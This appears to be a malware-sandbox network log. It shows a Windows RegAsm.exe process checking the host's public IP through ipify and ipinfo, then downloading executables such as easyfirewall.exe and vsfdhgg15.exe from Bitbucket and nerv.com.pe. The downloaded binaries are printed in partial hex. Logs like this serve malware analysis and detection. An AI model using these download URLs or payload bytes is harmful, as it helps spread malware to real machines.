                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: api64.ipify.org
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC156INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:03 GMT
                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                        Content-Length: 20
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                                                                                                                                        Data Ascii: {"ip":"8.46.123.33"}


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.94970834.117.59.814437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC236OUTGET /widget/demo/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Referer: https://ipinfo.io/
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC458INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                        Content-Length: 1025
                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                        date: Sat, 21 Sep 2024 12:48:03 GMT
                                                                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC932INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20
                                                                                                                                                                                                                                        Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC93INData Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                        Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.949725185.166.143.484437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC232OUTGET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC4997INHTTP/1.1 302 Found
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6 [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                                                                        X-Served-By: 3a7b0a78ac00
                                                                                                                                                                                                                                        X-Version: 80907f89f58b
                                                                                                                                                                                                                                        X-Static-Version: 80907f89f58b
                                                                                                                                                                                                                                        X-Request-Count: 3787
                                                                                                                                                                                                                                        X-Render-Time: 0.03911185264587402
                                                                                                                                                                                                                                        X-B3-Traceid: 8bf1de2f1d4b43f9b25e6cf2b11a5252
                                                                                                                                                                                                                                        X-B3-Spanid: b7a6021bc027893e
                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none'; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net f [TRUNCATED]
                                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999268.843
                                                                                                                                                                                                                                        X-Usage-Request-Cost: 742.93
                                                                                                                                                                                                                                        X-Usage-User-Time: 0.017560
                                                                                                                                                                                                                                        X-Usage-System-Time: 0.004728
                                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                        Atl-Traceid: 8bf1de2f1d4b43f9b25e6cf2b11a5252
                                                                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.949729162.241.61.2184437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC200OUTGET /vsfdhgg15.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: nerv.com.pe
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 21:15:01 GMT
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 423328
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3e e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>f: @@ `
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 40 2e 88 34 1d eb 0f 56 25 84 77 25 8c 9b 8f 34 f5 00 29 82 90 8c 06 05 b3 89 cf 78 55 8c 0c c1 4c a6 6f 87 b1 44 c3 bd c1 02 81 85 9b d6 54 3d 46 f9 6f 7d d1 d1 16 c8 60 f6 59 f4 3a 40 da 1c ec 0e dc eb 42 4f b7 5a fd 65 c8 d8 60 6d 63 ab 71 8a bc 7a 7a b4 56 ce a8 1f a4 78 a7 30 b0 66 3f 15 71 eb aa 77 d8 10 f6 42 ef d7 f0 d9 60 87 5a 38 86 e0 29 00 0a bb 95 65 99 53 74 04 77 81 39 12 30 c1 99 17 50 34 41 5b 8c e0 ea 06 2a 8f fe 7f 0d cf 0b 13 ba 5e 3e 9a 5c 2c 90 27 40 70 d6 a3 fe 5a 2c ac 81 22 e8 66 53 ec ed 62 d5 ba b1 44 76 18 45 0b 27 6a d6 17 77 ac e9 17 61 b8 1a fd 37 ac 08 75 35 ec c7 d3 6c 2d d0 b9 e8 0a 83 7c a6 16 2e 68 91 a1 0a 2e 4f 4c 2c fa bc b7 8f 0c 62 bb 7b 22 26 e2 37 53 e9 ab 2d 83 97 17 4c d0 16 04 10 00 b6 57 39 0e b0 87 32 16 90
                                                                                                                                                                                                                                        Data Ascii: @.4V%w%4)xULoDT=Fo}`Y:@BOZe`mcqzzVx0f?qwB`Z8)eStw90P4A[*^>\,'@pZ,"fSbDvE'jwa7u5l-|.h.OL,b{"&7S-LW92
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 9b 8c 02 2a 10 54 80 aa bc 93 84 b2 db d2 5a cf 61 0c d6 03 5a fb 26 fa 61 56 fd 81 e8 17 f9 d5 73 64 5d 71 76 3e 99 7b 19 bc e7 9a c3 dc 8a 55 6f f9 7d 75 e0 0f 47 86 19 ff da b2 bd 78 43 14 a9 dc b9 a4 b6 5a b4 34 76 18 97 ba 47 dd 83 a9 07 f7 4b a0 78 bc f7 e8 38 99 63 a0 2e e5 26 c1 e1 3d 71 15 64 26 a9 2f e4 fe 76 b3 5b 93 55 88 23 bb f3 ff 89 3d a4 3f 6d a7 d8 20 07 34 65 ee cd 1d f0 7a dc 2d de cb 43 d4 5c 33 9f 4f 78 b5 0f 3c c7 03 c0 e1 ad b0 38 0c 54 fc 15 e8 88 a2 c2 92 97 8b 64 f8 0b f5 50 c4 76 43 77 07 51 52 d6 20 7e 22 18 8d 8e ee 2b d6 c6 4f 9f d4 2b 28 c5 71 ff ad ce c9 c9 d0 fb 12 be 2b 5e 64 5e 32 1f 92 cc 8c 9d 82 86 35 36 60 b4 64 c3 52 5b 25 9c df da 1a 88 b6 c6 64 e9 f4 55 c5 90 91 1f ad 38 ed e1 68 52 32 5d d8 6d 8f 8c b7 09 a7 01
                                                                                                                                                                                                                                        Data Ascii: *TZaZ&aVsd]qv>{Uo}uGxCZ4vGKx8c.&=qd&/v[U#=?m 4ez-C\3Ox<8TdPvCwQR ~"+O+(q+^d^256`dR[%dU8hR2]m
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: e5 66 7c 0f 55 38 09 e0 9b c8 33 26 9e 54 37 ae 54 6a 8b 9a 71 05 57 9a 89 c5 68 27 2a 87 ee 29 3c 24 56 c0 0c b6 df 2e bd 06 b0 38 22 34 36 65 47 4c 18 e3 d4 b2 2b 37 b7 76 8b d4 dc 10 3e 98 18 de 0c 01 c7 7e a6 81 06 74 4d e3 80 c9 14 e2 03 12 93 21 25 f2 12 1f 4f dd 65 e0 91 e1 5d 67 99 37 5c ae 52 e6 cb 33 df 97 c7 a5 5f d5 0f 82 c0 b8 86 ad 6c f8 3a 98 ed e0 cf 2c b5 ed b7 8a a7 7e dd 9c ad 09 71 f7 52 4b 27 47 0a c6 99 ff 98 82 59 be e9 e5 9a c1 6c 1e a8 82 64 f0 57 4e cc e2 f7 f4 5a 40 fc 4e 3d 14 35 4b da 2a c3 3c 9b 2e 79 d8 67 ce 25 89 f3 16 c5 e1 75 27 6e c1 b1 0b 13 ba 5d a2 6b 63 9e 01 5c 31 9a b7 71 c2 5c bd 29 e9 6e f2 95 bd f7 5a c6 c5 47 d1 d2 59 70 14 61 f2 2a da c9 68 9c 1d ca 43 c8 12 ca e1 0d 3d 1c 6b c7 10 d2 7b 61 d0 a6 ad 1f 83 ab
                                                                                                                                                                                                                                        Data Ascii: f|U83&T7TjqWh'*)<$V.8"46eGL+7v>~tM!%Oe]g7\R3_l:,~qRK'GYldWNZ@N=5K*<.yg%u'n]kc\1q\)nZGYpa*hC=k{a
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: c0 f5 1a b4 72 8b ca 4c 82 8f c7 eb be 92 b6 0c fd d2 7a ad 70 69 c7 78 57 fd 91 91 74 ef 4b 09 1f ef e9 3a f5 bc df bb f6 9c b8 29 70 15 30 75 83 6e 8c 23 77 5c ab 96 54 8a 45 52 a9 04 ea f5 fd 26 f1 b8 b5 79 47 f3 25 84 41 3f bb d0 01 8d d3 10 ce 01 19 32 05 9e bb 6b 9b 75 e9 0c c7 b9 48 c4 06 34 da 00 f1 25 34 1e 72 fd 9a b5 52 74 87 eb c0 34 f1 90 5f 84 00 8e d8 9a 91 93 d9 55 45 45 37 15 d5 34 79 1f af 88 cd 5f 2a 4f 60 c1 9e 0c 85 74 e1 e0 ff d2 3f 3c b8 2d b9 95 e3 9b f5 3b 5b 2f 7d 9f 4f ca 82 c7 df bf c6 5c 10 01 e0 6a cf aa 7f 08 1f cd 8a 83 1f e3 7e b0 f5 a7 5e 61 12 ab fc 36 34 ba 3d cb 4a bc c4 52 1f b9 c3 e0 e2 5e b8 4d a6 dc fa 1c 93 0d 65 47 7e 3b e1 1c 5d fb 1e fb 52 ea 2b 41 ef 7b 90 15 bd 6a 0c d2 e0 6c a5 7d 0e 93 3d 6f 94 bd 9e 47 93
                                                                                                                                                                                                                                        Data Ascii: rLzpixWtK:)p0un#w\TER&yG%A?2kuH4%4rRt4_UEE74y_*O`t?<-;[/}O\j~^a64=JR^MeG~;]R+A{jl}=oG
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 78 07 c1 4f 58 a2 ee 75 cd 06 2a 0d cf 94 6e 4f 4d e6 fb fd bf 6e 2c 44 b4 c5 77 fc 32 81 fb 3f d8 0d b2 31 c8 b5 cd 0b 60 41 66 60 19 99 5d da d3 54 a7 4f bd ec bc 39 46 63 0e b9 bb 9f 5d d2 c0 76 44 47 8b dd d4 44 13 53 cc 92 0f 21 d1 88 b5 65 5a a5 eb 35 31 27 a9 b3 aa a5 ec c1 c9 8e ad 4f a5 d6 80 28 a7 d5 d1 16 92 56 da ad 21 87 8e 72 12 d4 5a 0b c5 3e 29 3a e9 6e ce 8e 04 d6 d8 43 8a de 2d 6e 93 cb 25 66 01 26 de 4c 2e 8d 8a 3b 94 82 2b 53 1a 53 99 27 f1 4b d1 4f 22 1d 9d de ea e0 12 c9 21 36 08 c7 4c 11 13 7f 09 57 47 36 fd c0 f7 df 5a 77 55 fd 2b 96 c3 df 33 49 bd 3f bb 95 1a bb ea 0e 07 d0 02 90 d7 9e 06 34 7b f7 0a 96 30 cf 2e 03 6e d0 d5 bc 1c 18 4b f9 4e d8 6c a0 1f e9 6b a6 34 4d d1 c1 8a 43 df 2a 9d de 9a e6 fa bb 9d 78 ef 54 e1 6c 07 1b eb
                                                                                                                                                                                                                                        Data Ascii: xOXu*nOMn,Dw2?1`Af`]TO9Fc]vDGDS!eZ51'O(V!rZ>):nC-n%f&L.;+SS'KO"!6LWG6ZwU+3I?4{0.nKNlk4MC*xTl
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 6e fb 58 47 20 b9 48 e7 23 e9 aa 01 25 a4 29 33 20 64 64 50 86 90 53 9d b4 86 2f 11 60 cd 2e a5 a3 46 ba 8d 52 a9 ae 88 a9 75 47 5e a1 18 3f 36 0a 89 88 4b 02 53 7c 1c 4c 49 42 07 c9 d1 31 5d 70 07 69 4f 45 af cb 38 5b 51 41 f4 ef c6 2a 3b 71 a3 fb 0b 9c 8f 3b c9 cc c5 c3 31 19 0b 8c 37 76 47 df 34 37 b4 33 b8 1b 94 64 33 51 be d9 09 89 c8 99 b8 69 e9 3d 80 cf 66 e0 1c 2a 81 e6 6a d9 83 f6 82 ef 74 21 9e fd bb 36 23 29 b0 1f dd 2b 93 6f b2 07 df 03 7d d9 2e c1 c9 c2 06 be e4 1e d2 34 da 6f 4b 51 ce 8d 1d 50 60 4c 8c 74 a7 ec 0b 28 e3 df db 15 55 01 fe 4b c8 d2 6e 48 78 a6 7c bf 70 3f 76 e4 27 f5 83 ff 92 a0 91 f9 dc 5d ef 9e 44 da 00 73 10 23 a4 b6 80 9b 9d fc 3f 2b 4f ea 5d 8b 8e be 47 92 89 51 a1 97 5c d6 27 85 35 bd 35 1b 02 8d 4b 13 3c fb f8 ae 6f 72
                                                                                                                                                                                                                                        Data Ascii: nXG H#%)3 ddPS/`.FRuG^?6KS|LIB1]piOE8[QA*;q;17vG473d3Qi=f*jt!6#)+o}.4oKQP`Lt(UKnHx|p?v']Ds#?+O]GQ\'55K<or
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: b1 d1 37 88 52 5f d8 26 1f ef 27 fe af c8 7f c2 28 77 9c ac 05 a3 64 a4 c9 38 a4 47 63 ef 96 e8 e2 cb 8b de c4 05 75 eb 63 3a 1b 1c ac a8 ff b1 d4 cb e6 21 f6 b0 02 93 68 86 55 17 ee 09 dd 0d 27 b7 ea 6d a3 4b c8 23 77 50 e8 cb e0 17 75 5e d6 ab 48 01 91 fa 21 0f 4e 03 d2 c2 fc 29 63 e1 70 d1 06 84 95 47 93 d3 7b 2e 83 36 04 c5 4d f7 9b 05 0c a4 cb a3 46 b8 bc f9 0d 45 a6 7a 0c 8b 27 b0 c5 ea 7b 34 d5 3f 9f 18 5f 54 d6 45 a3 ba a6 f4 20 e3 1d 73 ef 1a 00 2b 4a fc 3c 1a 6c 7f e8 5e 11 62 23 4a 98 74 91 48 34 0e 96 bf 91 a4 9d 2c b5 c1 16 9a be e6 52 12 5c 67 cd bf a1 f5 5b 45 f2 23 15 87 bf e9 aa ec b2 12 d1 e1 fb ab d5 16 30 1c d8 73 62 ad fa e8 3c f6 dc 2b d0 b2 a0 2a ae 54 fb 55 c6 91 21 53 60 b6 c1 72 41 ae c7 a9 16 0d 9e ba 29 09 86 24 cc fc 92 92 7d
                                                                                                                                                                                                                                        Data Ascii: 7R_&'(wd8Gcuc:!hU'mK#wPu^H!N)cpG{.6MFEz'{4?_TE s+J<l^b#JtH4,R\g[E#0sb<+*TU!S`rA)$}
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 1c 33 92 e3 ac 14 e2 8b 5e 00 ce e9 ab 93 dd 71 36 91 3d 3c 2c 8e cd 05 1d f2 70 3f 85 60 3a ff f4 3e e7 ed b1 1e 4a f6 2c 08 dc 9f 08 33 cf 45 06 9b a3 fd a4 c7 dc 8c b6 06 ed 17 ee e7 a4 e1 f7 8c dc e7 1a 13 46 d9 68 48 03 fe 4f 22 18 e7 c7 b7 9d 4d af cf 9e 8e 31 8d 8c ba 9d a1 f3 47 5b 08 58 68 3b ac 08 65 97 6f a1 b1 b6 07 ea f1 63 d2 e7 f7 90 10 0a ad e8 6d e5 37 44 28 19 73 4f 72 73 44 71 8c 02 f3 41 9f 62 c5 b4 82 14 ac e0 2c 10 82 79 fd 8f a5 dd 32 b5 f7 15 57 f6 cf 8a 8b d1 9f 7e 38 6a 25 f0 73 18 42 7c c4 f7 24 76 b6 3f 8b f1 e9 ca 09 40 a8 0f ef b3 aa 5c 59 c8 85 2e 40 84 67 45 02 94 2b 71 9b 6e d5 63 03 81 0b 8e 28 8e 8d be 29 4a 11 28 ea d5 70 ef af fe 77 f1 1a cc 07 37 85 57 97 42 c3 9b ee c0 2b 55 27 55 f5 ed 98 f7 72 85 8b 41 95 c7 6b 6f
                                                                                                                                                                                                                                        Data Ascii: 3^q6=<,p?`:>J,3EFhHO"M1G[Xh;eocm7D(sOrsDqAb,y2W~8j%sB|$v?@\Y.@gE+qnc()J(pw7WB+U'UrAko
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: cc b8 e3 b4 14 43 7a 68 87 86 22 69 88 d7 e2 28 f2 ce 34 f5 ca 2b 9b c8 71 7e 39 93 78 2d e7 06 78 2f f3 63 3c c4 15 85 b6 35 ea 3e 84 36 fe db b4 d7 07 cf 69 46 83 d0 30 8f 24 3f 59 29 f7 19 d5 de 82 de 44 49 c1 5c f7 2a 74 92 0b f3 58 ff cd 0b c0 69 02 3b 18 30 63 68 3c 97 ef 68 af 32 e6 14 e3 c4 55 e6 54 57 cf 16 5e 71 35 92 4d 2b c2 3b 09 5d c9 7f 3a b2 31 ed 0c 55 4a dd 71 b1 2f 11 85 6d 12 d1 30 61 04 e1 f5 16 72 5f 97 1e d1 31 3b 30 bc 90 32 8a 45 b6 39 51 22 01 cf 6e 27 af 4d 2a 00 49 29 d1 77 ce a3 70 a6 43 86 f4 2d af 46 9e 32 8e 9b 24 ee 7c 9f e3 ea 6f 44 5a cd bc 96 32 41 96 16 0b 88 18 f8 39 e4 62 17 8c 28 b1 a2 17 8c 0d 46 2e ac 19 43 d5 d6 0d ae cf f6 a5 95 de 37 53 80 c5 f6 6a 34 fe d1 c6 bd 04 46 08 63 00 cb fd b3 02 cb 50 b8 f0 cf 5c 7e
                                                                                                                                                                                                                                        Data Ascii: Czh"i(4+q~9x-x/c<5>6iF0$?Y)DI\*tXi;0ch<h2UTW^q5M+;]:1UJq/m0ar_1;02E9Q"n'M*I)wpC-F2$|oDZ2A9b(F.C7Sj4FcP\~


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.949726162.241.61.2184437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC198OUTGET /vfsdgdf.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: nerv.com.pe
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 21:15:00 GMT
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 423328
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2f: @@ `
